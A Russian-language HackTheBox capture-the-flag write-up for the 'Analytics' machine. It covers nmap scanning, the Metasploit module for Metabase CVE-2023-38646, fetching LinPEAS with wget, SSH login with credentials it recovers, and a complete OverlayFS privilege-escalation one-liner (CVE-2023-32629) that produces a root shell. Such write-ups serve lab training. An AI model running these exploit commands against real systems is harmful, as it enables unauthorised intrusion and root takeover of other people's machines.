HTB Analytics. Повышаем привилегии с помощью CVE-2023-32629
Приветствую, кулхацкеры. Сегодяшний райт будет посвящен взлому
Linux — машины с HackTheBox под названием Analytics.
Дисклеймер: все утилиты и техники, продемонстрированные в статье, приведены в учебных целях
Сканирование и разведка
Как всегда начинаем со сканирования для выявления активных сервисов.
nmap -sC -sV -Pn -p- -T4 10.10.11.234
Получаем первичный доступ с помощью Metasploit
По результатам сканирования можно заметить, что на 80 порту висит веб-сервис. Попробуем перейти на веб страницу:
Это Metabase. Посерфив на просторах интернета, найдем для него эксплойт. Уязвимость имеет идентификатор CVE-2023–38646 и приводит к удаленному исполнению кода. Как раз то, что нужно для получения первичного доступа. Эксплойт можно найти как на GitHub, так и в Metasploit. Лично я запущу эксплойт в Metasploit:
use exploit/linux/http/metabase_setup_token_rce
Для дальнейшего продвижения нам нужно закинуть на машину LinPEAS для обнаружения способов повышения привилегий. Поэтому запустим на нашей ОС python3 http.server
и через wget
скачаем нужный нам скрипт:
python3 -m http.server 80
wget http://10.10.16.68/linpeas.sh
Запустим LinPEAS:
bash ./linpeas.sh
Отработав, скрипт найдет креды для подключения по SSH:
Подключимся к машине с помощью ssh
:
ssh metalytics@10.10.11.233
Здесь же будет находится флаг user.txt
Повышение привилегий
Точно также запустим python3 http.server
, перекинем через wget
LinPEAS и запустим его на машине:
После отработки скрипта определим версию Ubuntu и найдем под нее уязвимость для повышения привилегий. Либо можно определить версию ОС с помощью cat /etc/os-release
. Уязвимость для повышения привилегий связана с расхождениями в реализации модуля OverlayFS в ядре Linux. OverlayFS — это реализация файловой системы с объединенным монтированием, которая становится предметом внимания злоумышленников из-за возможности получения непривилегированного доступа через пространства имен пользователей и наличия легко эксплуатируемых ошибок. Скопируем нагрузку с эксплойта и запустим ее для повышения привилегий:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
Машина пройдена!